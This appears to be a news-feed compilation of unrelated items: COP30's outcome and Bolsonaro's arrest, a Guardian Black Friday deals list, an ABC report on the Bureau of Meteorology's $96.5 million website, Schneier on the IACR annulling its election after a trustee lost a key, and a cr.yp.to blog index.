In Belém, Brazil, the U.N. climate summit, known as COP30, has concluded without an agreement to phase out the use of coal, oil and gas, which are by far the largest contributors to global climate change. More than 80 countries had supported a transition away from fossil fuels, but they were blocked by oil-producing nations, including Russia, Saudi Arabia and the United Arab Emirates. This is Irene Vélez Torres, Colombia’s environment minister.

Irene Vélez Torres : “The root cause of this problem is fossil fuels. How are we dealing with that? How are we going to come out from this COP to say and to tell the people that we deny the most basic scientific truth, which is that the fossil fuels are the cause of more than 80% of the emissions that are generating climate change?”

The COP30 agreement also makes no new commitments to halt deforestation, nor does it address global meat consumption, another major driver of global heating. More than 1,600 fossil fuel industry lobbyists and 300 industrial agriculture lobbyists attended COP30; meanwhile, the Trump administration did not send a formal delegation, after the White House in January withdrew the U.S. from the Paris Climate Agreement for the second time.

Brazil’s Former President Jair Bolsonaro Arrested After Tampering with Ankle Monitor

Nov 24, 2025

Former Brazilian President Jair Bolsonaro has been arrested after he tampered with his ankle monitor while under house arrest. The arrest was ordered by Brazil’s Supreme Court Justice Alexandre de Moraes over fears that Bolsonaro would attempt to escape his compound, days before he was heading to prison. Back in September, Bolsonaro was sentenced to 27 years in prison for plotting a military coup against Brazil’s current President Luiz Inácio Lula da Silva.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Non-commercial news needs your support

We rely on contributions from our viewers and listeners to do our work.
Please do your part today.

Make a donation

The best Black Friday deals on the products we love, from sunrise alarm clocks to dehumidifiers

Guardian
www.theguardian.com
2025-11-24 12:56:27
We’ve cut through the noise to find genuinely good early Black Friday 2025 discounts on Filter-recommended products across home, tech, beauty and toys • Big savings – or big regrets? How to shop smart this Black Friday• The best Black Friday beauty deals Like Christmas Day, Black Friday has long sin...
Original Article

L ike Christmas Day, Black Friday has long since ceased to be a mere “day”. Yuletide now seems to start roughly when Strictly does, and Black Friday kicked off around Halloween, judging by the landfill of exclamation-marked emails weighing down my inbox.

Black Friday is a devil worth dancing with if you want to save money on products you’ve had your eye on – and it can pay to start dancing now. Some of the Filter’s favourite items are already floating around at prices clearly designed to make them sell out fast. Other deals won’t land until the big day itself on 28 November, or even until the daftly named Cyber Monday (1 December).

As ever, we’d encourage you not to buy anything unless you really need it and have the budget to do so – read our advice on how to shop smartly .

We’ll keep this page updated over the next few days with more genuine Black Friday bargains on the Filter’s favourites, from Anker battery packs to KidiZoom cameras via the espresso machine you loved more than any other product this year.


How we selected these deals (and excluded others)

The key to shopping smart on Black Friday, Cyber Monday or any discount event is to know what you want – and we’re here to help you target the good stuff. We’ve tested thousands of products at the Filter in 2025 and warmly recommended hundreds of them, including many that have genuinely good Black Friday discounts.

Instead of listing price cuts on all the products we’ve featured, we’ve focused on the things you’ve liked the most this year, and looked for deals that undercut their long-term average prices by a significant amount. Ideally, their Black Friday price will be their lowest of the year.

We don’t take retailers at their word on discount size, either. Amazon may say it’s “70%” off the RRP, but we study the price history of every item using independent tools such as the Camelizer to find out how generous a discount really is. If an item’s price has been all over the place in 2025, we’ll give the average price below instead of a “was …” price, so you can judge how good a deal it is.

Q&A

How is the Filter covering Black Friday?

Show

At the Filter, we believe in buying sustainably, and the excessive consumerism encouraged by Black Friday doesn’t sit easily with us. However, we also believe in shopping smarter, and there’s no denying that it’s often the best time of year to buy big-ticket items that you genuinely need and have planned to buy in advance, or stock up on regular buys such as skincare and cleaning products.

Retailers often push offers that are not as good as they seem, with the intention of clearing out old stock, so we only recommend genuine deals. We assess the price history of every product where it’s available, and we won’t feature anything unless it is genuinely lower than its average price – and we will always specify this in our articles.

We only recommend deals on products that we’ve tested or have been recommended by product experts. What we choose to feature is based on the best products at the best prices chosen by our editorially independent team, free of commercial influence.


The best early Black Friday deals on the Filter’s favourite products


Best toys and games deals


Family board game that isn’t Monopoly

Azul tile laying game

Azul tile laying game, £2 5.49 (avg £31.42)

£25.49 at Amazon

The Filter team recommended this pattern-building game as an “addictive” Father’s Day gift “guaranteed to be a hit”, but it’s far too good to leave to just the dads. It’s mercifully quick to learn and suitable for tweens and up, so you and your Christmas visitors can have a bout underway faster than you can say “read the instructions”. This is the first time its price has dropped much below £30 since 2023.


Family card game

An open tin of the Dobble game with the cards around it

Dobble original, £6.99 (avg £9.16)

£6.99 at Amazon

Race to find the matching images in this popular observation game – one of our top tips for keeping kids entertained on long train journeys . You can mix things up with games-within-games such as “hot potato” and “catch them all”, and it’s versatile enough to suit any number of players from two to eight. This deal isn’t quite the 50% off that Amazon claims (its average price on the site is under £10), but this is its lowest price of 2025.


EA Sports FC 26

EA Sports FC 26 PS5 Game

EA Sports FC 26 for PS5, from £34.99 (was £69.99)

£34.99 at PlayStation Store
£37.99 at Amazon

EA’s FC 26 was released to great fanfare in September, and it’s proved to be one of Amazon’s best Black Friday sellers so far. As Ben Wilson explains in his four-star review , this versatile game is a sim offline and a whole other beast online, where it’s purely an esport with shots and goals prioritised over defending. Unusually, Amazon is beaten to the lowest price on this one – by the PlayStation store, no less.


The best tech deals


Silk sleep headphones

Best Sleep Aids. Snoozeband silk
Photograph: Jane Hoskyn/The Guardian

Snoozeband Silk, £84 (was £99)

£84 at Snoozeband

Block out the world and drift off to whatever music, podcast or white noise you choose with this comfy silk sleep mask that incorporates flat Bluetooth speakers for pairing with your phone. It impressed our writer Jane Hoskyn in her mission to find sleep aids that actually work, but she found it a little pricey – so this discount is very welcome, and makes the Snoozeband an even better Christmas gift idea.


Running watch with Spotify

Garmin Forerunner® 165 Music Turquoise/Aqua

Garmin Forerunner 165 Music smartwatch, £208.05 (was £289)

£208.05 at Amazon

One of our favourite fitness tech gadgets, Garmin’s GPS smartwatch can’t run a marathon for you, but it sure can help ease the pain with its pace-tracking tools, offline Spotify support and 19-hour battery life. Amazon outdoes its rivals with this early deal on the aqua green edition of the watch, now at its lowest price ever.


Professional DJ headphones

AiAiAi TMA-2 DJ headphones

AiAiAi Audio TMA-2 DJ headphones, £124.94 (was £159)

£124.94 at Amazon

Many headphones claim to be pro or DJ-level, but this modular set is a favourite with actual DJs . DJ and producer Sophie Lloyd told the Filter’s Kate Hutchinson that she loves the sound quality, size and durability of these phones, adding that their modular design means “you can buy a new lead or earpieces separately, which is essential when you’re using them all the time”. This Black deal takes them to their lowest price of 2025.


Portable Bluetooth speaker

Bose SoundLink Flex Portable Bluetooth Speaker

Bose SoundLink Flex 2nd gen, £108.95 (was £149.95)

£108.95 at John Lewis
£108.95 at Amazon

This fab portable speaker boasts 12-hour battery life, durability and a range of swish colours, making it a must-have for university life and beyond. It’s a superb piece of kit for the price, with excellent sound quality, nine-metre Bluetooth connectivity and smart TV support.


The best home deals


Heated fleece throw

Silentnight Luxury Heated Throw

Silentnight luxury heated throw, from £36 (was £45)

£36 at Boots
£36.25 at Amazon

One of Amazon’s best sellers this Black Friday but 25p cheaper at Boots, Silentnight’s toasty fleece blanket was one of the lighter and thinner options in our best heated throws roundup. That makes this 120 x 160cm throw ideal for wrapping around yourself (and no-one else) on the sofa as the evenings grow ever colder.


Smart baby monitor

Owlet Dream Sock

Owlet Dream Sock, from £199 (was £299)

£199.99 at John Lewis
£199 at Amazon

Owlet’s feature-packed smartphone-compatible baby monitor was one of the favourite baby products when we spoke to parents last year. If you’d rather not give your £199 to Amazon, John Lewis is only 99p more.


The best combination steam cleaner

Vax Steam Fresh Combi Classic Steam Mop

Vax Steam Fresh Total Home mop, from £84 (was £160)

£84 at Amazon
£84.99 at Currys

Emerging from Stuart Andrews’ best steam cleaners test as the “best combination cleaner”, Vax’s versatile mop proved easy and effective to use on multiple surfaces and tight corners. The handheld bit detaches easily from the body then slots back in when needed, and you get an array of brushes, scrapers, pads and nozzles. This dirt-blitzing package has dropped more than 40% at Currys and Amazon.


Smart wake-up and reading light

Philips SmartSleep Sleep and Wake-Up Light

Philips SmartSleep sleep and wake-up light, £139.99 (avg £179.61)

£139.99 at Philips
£139.99 at Amazon

When testing products for his guide to the best sunrise alarm clocks , our writer Pete Wise was struck by how well this one worked as a reading light. “Even when a bright setting is selected, the light seems relatively mellow and restful,” wrote Pete, who also liked the range of alarm sounds and audio input option. He found it a little too expensive, however – and it’s still north of £100, but somewhat less so.


The best heated clothes airer

Dry:Soon Deluxe 3-Tier Heated Clothes Airer

Dry:Soon Deluxe heated airer, £159.99 (was £199.99)

£159.99 at Lakeland
£159.99 at Amazon

A heated airer dries your clothes fast enough to avoid the dreaded stink of slow-dried laundry, and without the cost or noise of a tumble dryer. Lakeland’s three-tier heated airer – the top performer in our heated airers test – has proved enduringly popular with the Filter’s readers, and is now at its lowest price ever. Lakeland has also dropped the price of the airer with cover to £195.98 for Black Friday.


The best hybrid mattress

Testing the Otty Original Hybrid mattress
Photograph: Jane Hoskyn/The Guardian

Otty Original Hybrid double, £627.75 with code THEFILTER7 (was £647.99)

£627.75 at Otty

The most comfortable and supportive foam-and-springs hybrid of all the mattresses we’ve tested, the Otty already came at an impressive price of £647.99 for a double, but the Filter’s exclusive code gives you a small but perfectly welcome additional 7% off for Black Friday. For a deeper dive into this cosy mattress, read our Otty Original Hybrid review (spoiler: it gets five stars). Otty is now bundling two of our favourite pillow (usually £69.99 each) in with each mattress order, too.


Simba Pro hybrid mattress

Simba Hybrid Pro Mattress

Simba Hybrid Pro king size, £948.27 (was £1,299)

£948.27 at Simba

Mattress “discounts” may seem to be a 24/7/365 thing, but UK watchdogs have given companies short shrift over money-off claims that aren’t all they seem. We’ve certainly noticed Simba playing by the rules lately, and its current 30%-off sale is the first we’ve seen in months. The excellent Simba Hybrid Pro , another of our best mattresses , is now hundreds of pounds cheaper in all sizes, from single (now £599.25) to super king (now £1,091.22).


Wool mattress topper

woolroom mattress topper

Woolroom Deluxe wool topper (double), from £ 148.74 (was £174.99)

£148.74 at Amazon
£165.74 at the Woolroom

The sustainably sourced wool in Woolroom’s bedding is a hypoallergenic temperature regulator, helping to keep you warm in winter and cool on hotter nights. The company’s deluxe mattress topper adds a touch of softness to a too-hard mattress, and is one of the easiest toppers we tested to move and store. Woolroom’s 35% isn’t quite as big a discount as Amazon’s, but it applies to everything on its site, including duvets, mattresses and linens.


Powerful pressure washer

Bosch UniversalAquatak 36V-100 - 1 x 4.0 Ah battery | charger

Bosch UniversalAquatak 135 high pressure washer, £135 (was £209)

£135 at Currys
£135 at Amazon

Blitz the gunk from your patio, decking, gutters and any flat surface you find yourself unable to resist pointing the nozzle at. Our writer Andy Shaw found the UniversalAquatak to be the most powerful of all the pressure washers he tested, and he thought its price was reasonable too. It’s now even cheaper for Black Friday, although not quite its lowest price of 2025 – it was briefly (very briefly) under £120 for Prime Day.


Shark vacuum cleaner

Shark PowerDetect Clean & Empty Cordless Vacuum Cleaner

Shark PowerDetect vacuum, £314 (was £549)

£314 at Shark
£314 at Amazon

A vacuum cleaner that empties itself? Yes please, said our writer Andy Shaw in his roundup of the best cordless vacuum cleaners – and you agreed, making Shark’s ingenious and powerful cordless cleaner one of your favourite products of the year. Vacuums that look after themselves don’t come cheap, and it’s great to see this one heavily discounted at Shark’s own website as well as at Amazon.


The best robot vacuum cleaner

Eufy X10 Pro Omni robot vacuum

Eufy X10 Pro Omni, £499 (was £579)

skip past newsletter promotion
£499 at Amazon
£499 at Argos

You wait a lifetime for a self-emptying vacuum cleaner, then Black Friday brings you two at once. The Eufy X10 was named “best overall” by Stuart Andrews in his guide to the best robot vacuums , and it’s already one of the fastest-selling items in Amazon’s Black Friday sale. Its price cut isn’t quite the 38% Amazon suggests, because it cost £579 throughout 2025, but this is still a legitimately good deal.


Damp-destroying dehumidifier

ProBreeze 20L Dehumidifier with Max Extraction and Laundry Mode

ProBreeze dehumidifier, from £151.99 (was £189.99)

£159.49 at ProBreeze

This “workhorse”, which “extracted moisture powerfully” in our best dehumidifiers test, has tumbled to its lowest price of the year (except for a few days in May, because no one buys dehumidifiers in May). If the recent cold snap gave you the condensation blues, here’s your chance to snap up the ProBreeze for a chunk below its average Amazon price of just over £180.


Cuddly heated throw

Beurer XXL HD 150 Nordic Taupe Heated snuggle blanket

Beurer HD150 heated throw, £79.99 (was £84.99)

£79.99 at Amazon

Beurer’s “soft and sumptuous” fleece blanket was crowned “best throw overall” in our guide to the best electric blankets thanks to its ability to get toasty fast without using much energy. A fiver off is not a massive discount, but this is its cheapest recent price on Amazon, where it normally costs £84.99 – and other retailers still want over £100 for it. We’ll bring you any non-Amazon deals that emerge in the coming days.


Google video doorbell

Google Nest doorbell

Google Nest doorbell, from £119.98 (was £179.99)

£119.98 at Amazon
£129 at Currys

Sort the cold-callers from the welcome visitors when they’re still metres away from your front door, with this outstanding battery-powered doorbell that crashes to its lowest price since Black Friday 2023. Andy Shaw named it the best video doorbell overall, but lamented that you also have to fork out for a Nest Aware subscription at £80 a year to save recordings.


Budget electric blanket

Slumberdown Sleepy Nights Electric Blanket Single

Slumberdown Sleepy Nights electric blanket, king size, from £30.59 (was £45.99)

£30.59 at Amazon
£34.20 at Slumberdown

This Slumberdown Sleepy Nights performed admirably in Emily Peck’s test of the best electric blankets , heating quickly to a temperature that was comfortable to keep our reviewer warm through the night. It also has elasticated fitted straps to make fitment easy, and comes in a variety of sizes to suit your bed size. It’s the king-size one that’s been discounted.


Subscription-free video doorbell

Eufy Video Doorbell E340

Eufy Security doorbell E340, £74.99 (avg £151.29)

£74.99 at Amazon

Lots of video doorbells and home surveillance systems come with a recurring subscription to access some of their features, which you may wish to avoid. If so, then the Eufy Video Doorbell E340 was Andy Shaw’s pick in his testing of the best video doorbells out there. He liked the E340 precisely because of its dual camera setup to make keeping an eye on parcels a breeze, plus the onboard storage to stick it to cloud storage. Reliability of movement detection needed some work, though. At £74.99 from Amazon, it’s also at its lowest price ever this Black Friday from the big online retailer.


The best kitchen deals


Ninja assisted barista coffee machine

Ninja Luxe Café Premier Espresso Machine ES601UK

Ninja Cafe Luxe ES601UK, from £43 9 (was £549)

£439 at Amazon
£449.99 at Currys

Having cornered the market in air fryers, Ninja now has its eye on all your kitchen needs, starting with your morning coffee – however you take it, from cold brew to latte. The “sublime espresso”, “ingenious milk frother” and Barista Assist feature of the Ninja Luxe impressed our writer Sasha Muller enough to win it a place in the best espresso machines and best coffee machines , where Sasha noted that “you get a lot for your money” even at full price.


Great value kettle

Kenwood Ripple Kettle

Kenwood Ripple Kettle, from £27 (was £39.99)

£27 at Currys
£27 at John Lewis
£29 at Amazon

The best budget kettle in Rachel’s best kettles test, the handsome Kenwood looks more expensive than even its RRP suggests, and impresses with a wide pouring spout, single-cup boil and two water windows. Currys has the best Black Friday deal so far, with the white edition dropping to a bargain £27. At John Lewis it’s £28 for white or eggshell blue, while the Amazon deal is for midnight black.


Guinness draught pourer

Guinness Draught Nitrosurge Device

Guinness Nitrosurge device, £19.99 (was £30)

£19.99 at Amazon

This curious-looking device is a widget on steroids. It brings the nitro beer effect to your Guinness at home, enabling you to pour the black stuff in two-part draught style, just like any good bartender. It’s a brilliant Christmas gift idea, now with a third wiped off its price … so, sincere apologies if you bought it last week when we first recommended it. Note you’ll need to buy special Nitrosurge Guinness too, but that’s also in the Black Friday sale, at £16.50 for a pack of 10 one-pint cans.


Versatile espresso maker

De’Longhi Stilosa EC230.BK, Traditional Barista Pump espresso Machine

De’Longhi Stilosa espresso machine, £84.55 (was £89)

£84.55 at Amazon

The promise of “ludicrously tasty” espresso and “perfect microfoam for silky cappuccinos and flat whites” proved so irresistible that this was one of the Filter recommendations you loved most in 2025. Our writer Sasha Muller was already wowed by its affordability in his espresso machines test, and it’s rarely discounted at all, so we’re not too sad to see it drop just a few pounds for Black Friday.


Capsule coffee machine

Philips L’OR Barista Sublime Capsule Coffee Machine

Philips L’or Barista Sublime, from £45 (avg £69.40)

£45 at John Lewis
£47.99 at Amazon

The price of this sleek machine has bounced between £105 and about £60 since 2023, only ever dipping to £45 for Black Friday each year. Its compatibility, compactness and coffee impressed the Filter’s cuppa connoisseur, Sasha Muller, enough to be named “best capsule machine” in his bid to find the best coffee machines .


Ninja air fryer

Ninja Double Stack XL Air Fryer

Ninja Double Stack XL, £188 (was £269.99)

£188 at Ninja
£188 at Amazon

If you’re still holding out on buying an air fryer, here’s a rare chance to grab a big-name, big-capacity Ninja without the big price tag. Not quite so big, anyway. Rachel Ogden named the Double Stack XL “best compact air fryer” in her guide to the best air fryers , but with its 9.5lL capacity and four cooking levels, this thing can cook a lot . Still not cheap, but far below its average price of £229.


The best blender

Braun PowerBlend 9 Jug blender JB 9040 Black

Braun PowerBlend 9, £140 (was £199)

£140 at Amazon
£140 at AO

You can spend about £500 on a premium blender, but this superb model from Braun costs below £200 even at full price – something our best blenders tester, Rachel Ogden, could hardly believe when she named it “best overall”. Hold on to your smoothie, Rachel, because it’s now less than £150, and not just at Amazon.


Tefal air fryer

Tefal Easy Fry Dual XXL EY942BG0

Tefal Easy Fry Dual XXL, from £119 (was £199.99)

£119 at Argos
£119.99 at Amazon

Tefal is known mostly for its ActiFry tech, so when Rachel Ogden crowned the Tefal Easy Fry Dual XXL as the best air fryer , it made sense. She found it to be a sublime all-rounder in her testing, handling both chips and frozen food very well. With an 11-litre capacity, it’s also Tefal’s largest dual zone air fryer, making it handy for cooking a lot of food for larger families when you need to.


The best kettle we’ve tested

Bosch Sky Kettle

Bosch Sky kettle, £64.99 (avg £85.38)

£64.99 at John Lewis
£64.99 at Amazon

Crowned overall winner in Rachel Ogden’s missions to find the best kettles , this Bosch beauty now comes at a price offer you can’t refuse – and not just from Amazon. “A brilliant blend of robust form and function” wrote Rachel of this fashionably industrial-looking kettle, whose features include a low minimum boil (300ml), keep-warm setting and touch controls. Now its lowest price ever, in white or black.


The best personal care appliance deals


Sunrise alarm clock

Lumie Sunrise Alarm Wake up to Daylight Table Lamp, White

Lumie Sunrise Alarm, from £29.99 (was £49)

£29.99 at Amazon
£37.49 at Boots

One of your favourite Filter recommendations of the year, this gentle sunrise alarm clock will wake you up with kittens purring, birdsong, gently brightening light – or a plain old alarm sound if you prefer. It’s been around for a few years and saw a price hike in 2022 (cost-of-waking-up crisis?) before settling at just under £50 from most retailers, so this is a deal worth grabbing.


Water flosser

Waterpik Ultra Professional Electric Water Flosser – White

Waterpik Ultra Professional, from £59.99 (was £91)

£59.99 at Amazon
£73 at Currys

Blast the gunk from your gums without having to grapple with floss. The Waterpik Ultra is a countertop model so it takes up more space than the cordless type, but this gives it more versatility and saw it score top marks with our water flosser tester Alan Martin. If you’d rather avoid Amazon, you can find it discounted by other retailers, albeit not by as much.


The best IPL device

Philips Lumea IPL 9900 Hair Removal Device

Philips Lumea 9900 BRI951/01, £ 377.99 (avg £501.33)

£377.99 at Amazon

IPL (intense pulsed light) hair remover devices promise to banish stubbly regrowth without the pain of waxing and epilation – at a price. The Philips Lumea 9900, Lise Smith’s pick for best IPL device overall, has cost as much as £599.99 for much of the year, and occasional discounts rarely go below £450. Amazon’s current price shaves more than £40 off any other Black Friday deal we’ve found for this version, which comes with four attachments.


The best beauty deals


A bargain beauty Advent calendar

W7 Beauty Blast Makeup Advent calendar 2025

W7 Beauty Blast Advent calendar, £16.95 (was £19.95)

£16.95 at Amazon

Advent calendars are a Christmas staple, and we’ve seen lots of brands try to put a different spin on them in the past – beauty Advent calendars are some of the most prominent. This W7 Beauty Blast calendar provides excellent value for money at a deal-busting £16.95 from Amazon, especially as it provides genuinely useful products for most folks. The likes of the eyeshadows, primers, lip balms and such are travel-size, but apart from that, Sarah Matthews had little cause for complaint in her ranking of the best beauty Advent calendars .

Trade Chaos Causes Businesses to Rethink Their Relationship with the U.S.

Hacker News
www.nytimes.com
2025-11-24 12:47:38
Comments...
Original Article

Please enable JS and disable any ad blocker

Bureau of Meteorology asked to examine $96.5M bill for website redesign

Hacker News
www.abc.net.au
2025-11-24 12:35:15
Comments...
Original Article

The Bureau of Meteorology's (BOM) flawed and expensive redesigned website will come under renewed scrutiny, with the federal environment minister asking the agency's new boss to closely examine how it all went so wrong, and report back to him.

It comes amid revelations that the new website cost more than $96 million to design — a far cry from the $4 million figure it originally claimed had been spent.

The national weather agency was flooded with complaints by the public after the website was launched a month ago.

Users found it difficult to navigate, and also criticised the changes to the radar map , which made place names hard to read.

A weather radar being displayed on a phone, in front of a different radar on a computer screen

BOM users, farmers in particular, were critical of the changes made to the radar map. ( ABC Rural: Justine Longmore )

Farmers were scathing, as they were unable to locate rainfall data.

The federal government was forced to intervene, ordering the agency to fix the website.

The site has since reverted to the old version of the radar map and other tweaks have been made to the site, with further changes to be rolled out.

In a statement provided to the ABC, the BOM admitted "the total cost of the website is approximately $96.5 million".

'Complete rebuild necessary'

It said the cost breakdown included $4.1 million for the redesign, $79.8 million for the website build, and the site's launch and security testing cost $12.6 million.

"A complete rebuild was necessary to ensure the website meets modern security, usability and accessibility requirements for the millions of Australians who reply on it every day," a spokesperson said.

The spokesperson also said it had "continued to listen to and analyse community feedback" since the launch of the new website on October 22.

A person looks at the Bureau of Meteorology's new website on a mobile phone

The BOM says it continues to listen to and analyse community feedback. ( ABC News: Greg Bigelow )

Nine days after the launch it changed the radar map back to what it had previously been.

"This brought back the visual style that the community said they found intuitive and reliable for interpreting weather conditions,"

a spokesperson said.

"This option was already available on the new site but not as the default setting when visiting the page.

"On 7 November we implemented changes to help the community find important fire behaviour index information."

Future changes were also in the pipeline in response to community feedback, according to the spokesperson, but some updates had been paused due to Severe Tropical Cyclone Fina in northern Australia.

Minister's expectations 'have been made very clear'

Environment Minister Murray Watt said he had met twice in the past week with the new CEO Stuart Minchin to reiterate his concerns about the bungled process and the cost.

Murray Watt doorstop

The environment minister says he has met twice with the BOM's new boss. ( ABC News: Callum Flinn )

He has asked Mr Minchin to report back to him on the issue.

"I don't think it's secret that I haven't been happy with the way the BOM has handled the transition to the new website," he told reporters on Sunday.

"I met with him on his first day and during the week just gone, to outline again that I think the BOM hasn't met public expectations, both in terms of the performance of the website and the cost of the website.

"So I've asked him as his first priority to make sure that he can get on top of the issues with the website — the functionality — and I'm pleased to see they've made changes.

"But I've also asked him to get on top of how we got to this position with this cost, with the problems.

"He's only been in the job for a week but I think my expectations have been made very clear."

Dr Stuart Minchin the new head of the Bureau of Meteorology standing behind a lecturn

The minister has asked new BOM boss, Stuart Minchin, to prioritise the issues with the website. ( Supplied: BOM )

However the minister stopped short of describing the website as a sheer waste of money, saying he would wait to hear back from Mr Minchin before commenting.

"Before leaping to judgement, I want to see what the new CEO of the BOM has been able to establish as to the reasons for those cost increases and I'll make my judgement at that point in time."

'Another Labor disaster'

Nationals leader David Littleproud said there should be "consequences" after the revelations about the true cost of the website.

"It is unbelievable a private consultancy was paid $78 million to redesign the website," Mr Littleproud said.

"But then security and system testing meant that Australian taxpayers actually paid $96 million for what was nothing more than another Labor disaster,.

"The seriousness of this cannot be understated. This isn't just about a clunky website, the changes actually put lives and safety at risk.

"The new platform did not allow people to enter GPS coordinates for their specific property locations, restricting searches to towns or postcodes.

"Families and farmers could not access vital, localised data such as river heights and rainfall information and this missing data created panic and fear across communities.

"But now, the fact the BOM has been hiding the true cost of its white elephant and initially lying about the total figure is deeply concerning, considering that the BOM should be all about trust."

Chrome Jpegxl Issue Reopened

Hacker News
issues.chromium.org
2025-11-24 12:23:02
Comments...

IACR Nullifies Election Because of Lost Decryption Key

Schneier
www.schneier.com
2025-11-24 12:03:46
The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to nullify an online election when trustee Mot...
Original Article

The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to nullify an online election when trustee Moti Yung lost his decryption key.

For this election and in accordance with the bylaws of the IACR, the three members of the IACR 2025 Election Committee acted as independent trustees, each holding a portion of the cryptographic key material required to jointly decrypt the results. This aspect of Helios’ design ensures that no two trustees could collude to determine the outcome of an election or the contents of individual votes on their own: all trustees must provide their decryption shares.

Unfortunately, one of the three trustees has irretrievably lost their private key, an honest but unfortunate human mistake, and therefore cannot compute their decryption share. As a result, Helios is unable to complete the decryption process, and it is technically impossible for us to obtain or verify the final outcome of this election.

The group will redo the election, but this time setting a 2-of-3 threshold scheme for decrypting the results, instead of requiring all three

News articles .

Posted on November 24, 2025 at 7:03 AM 1 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.

NSA and IETF, part 3: Dodging the issues at hand

Hacker News
blog.cr.yp.to
2025-11-24 12:00:55
Comments...
Original Article

The cr.yp.to blog


Table of contents (Access-I for index page)
2025.11.23: NSA and IETF, part 4: An example of censored dissent. #pqcrypto #hybrids #nsa #ietf #scope
2025.11.23: NSA and IETF, part 3: Dodging the issues at hand. #pqcrypto #hybrids #nsa #ietf #dodging
2025.11.23: NSA and IETF, part 2: Corruption continues. #pqcrypto #hybrids #nsa #ietf #corruption
2025.10.05: MODPOD: The collapse of IETF's protections for dissent. #ietf #objections #censorship #hybrids
2025.10.04: NSA and IETF: Can an attacker simply purchase standardization of weakened cryptography? #pqcrypto #hybrids #nsa #ietf #antitrust
2025.09.30: Surreptitious surveillance: On the importance of not being seen. #marketing #stealth #nsa
2025.04.23: McEliece standardization: Looking at what's happening, and analyzing rationales. #nist #iso #deployment #performance #security
2025.01.18: As expensive as a plane flight: Looking at some claims that quantum computers won't work. #quantum #energy #variables #errors #rsa #secrecy
2024.10.28: The sins of the 90s: Questioning a puzzling claim about mass surveillance. #attackers #governments #corporations #surveillance #cryptowars
2024.08.03: Clang vs. Clang: You're making Clang angry. You wouldn't like Clang when it's angry. #compilers #optimization #bugs #timing #security #codescans
2024.06.12: Bibliography keys: It's as easy as [1], [2], [3]. #bibliographies #citations #bibtex #votemanipulation #paperwriting
2024.01.02: Double encryption: Analyzing the NSA/GCHQ arguments against hybrids. #nsa #quantification #risks #complexity #costs
2023.11.25: Another way to botch the security analysis of Kyber-512: Responding to a recent blog post. #nist #uncertainty #errorbars #quantification
2023.10.23: Reducing "gate" counts for Kyber-512: Two algorithm analyses, from first principles, contradicting NIST's calculation. #xor #popcount #gates #memory #clumping
2023.10.03: The inability to count correctly: Debunking NIST's calculation of the Kyber-512 security level. #nist #addition #multiplication #ntru #kyber #fiasco
2023.06.09: Turbo Boost: How to perpetuate security problems. #overclocking #performancehype #power #timing #hertzbleed #riskmanagement #environment
2022.08.05: NSA, NIST, and post-quantum cryptography: Announcing my second lawsuit against the U.S. government. #nsa #nist #des #dsa #dualec #sigintenablingproject #nistpqc #foia
2022.01.29: Plagiarism as a patent amplifier: Understanding the delayed rollout of post-quantum cryptography. #pqcrypto #patents #ntru #lpr #ding #peikert #newhope
2020.12.06: Optimizing for the wrong metric, part 1: Microsoft Word: Review of "An Efficiency Comparison of Document Preparation Systems Used in Academic Research and Development" by Knauff and Nejasmic. #latex #word #efficiency #metrics
2019.10.24: Why EdDSA held up better than ECDSA against Minerva: Cryptosystem designers successfully predicting, and protecting against, implementation failures. #ecdsa #eddsa #hnp #lwe #bleichenbacher #bkw
2019.04.30: An introduction to vectorization: Understanding one of the most important changes in the high-speed-software ecosystem. #vectorization #sse #avx #avx512 #antivectors
2017.11.05: Reconstructing ROCA: A case study of how quickly an attack can be developed from a limited disclosure. #infineon #roca #rsa
2017.10.17: Quantum algorithms to find collisions: Analysis of several algorithms for the collision problem, and for the related multi-target preimage problem. #collision #preimage #pqcrypto
2017.07.23: Fast-key-erasure random-number generators: An effort to clean up several messes simultaneously. #rng #forwardsecrecy #urandom #cascade #hmac #rekeying #proofs
2017.07.19: Benchmarking post-quantum cryptography: News regarding the SUPERCOP benchmarking system, and more recommendations to NIST. #benchmarking #supercop #nist #pqcrypto
2016.10.30: Some challenges in post-quantum standardization: My comments to NIST on the first draft of their call for submissions. #standardization #nist #pqcrypto
2016.06.07: The death of due process: A few notes on technology-fueled normalization of lynch mobs targeting both the accuser and the accused. #ethics #crime #punishment
2016.05.16: Security fraud in Europe's "Quantum Manifesto": How quantum cryptographers are stealing a quarter of a billion Euros from the European Commission. #qkd #quantumcrypto #quantummanifesto
2016.03.15: Thomas Jefferson and Apple versus the FBI: Can the government censor how-to books? What if some of the readers are criminals? What if the books can be understood by a computer? An introduction to freedom of speech for software publishers. #censorship #firstamendment #instructions #software #encryption
2015.11.20: Break a dozen secret keys, get a million more for free: Batch attacks are often much more cost-effective than single-target attacks. #batching #economics #keysizes #aes #ecc #rsa #dh #logjam
2015.03.14: The death of optimizing compilers: Abstract of my tutorial at ETAPS 2015. #etaps #compilers #cpuevolution #hotspots #optimization #domainspecific #returnofthejedi
2015.02.18: Follow-You Printing: How Equitrac's marketing department misrepresents and interferes with your work. #equitrac #followyouprinting #dilbert #officespaceprinter
2014.06.02: The Saber cluster: How we built a cluster capable of computing 3000000000000000000000 multiplications per year for just 50000 EUR. #nvidia #linux #howto
2014.05.17: Some small suggestions for the Intel instruction set: Low-cost changes to CPU architecture would make cryptography much safer and much faster. #constanttimecommitment #vmul53 #vcarry #pipelinedocumentation
2014.04.11: NIST's cryptographic standardization process: The first step towards improvement is to admit previous failures. #standardization #nist #des #dsa #dualec #nsa
2014.03.23: How to design an elliptic-curve signature system: There are many choices of elliptic-curve signature systems. The standard choice, ECDSA, is reasonable if you don't care about simplicity, speed, and security. #signatures #ecc #elgamal #schnorr #ecdsa #eddsa #ed25519
2014.02.13: A subfield-logarithm attack against ideal lattices: Computational algebraic number theory tackles lattice-based cryptography.
2014.02.05: Entropy Attacks! The conventional wisdom says that hash outputs can't be controlled; the conventional wisdom is simply wrong.

2025.11.23: NSA and IETF, part 3: Dodging the issues at hand. #pqcrypto #hybrids #nsa #ietf #dodging

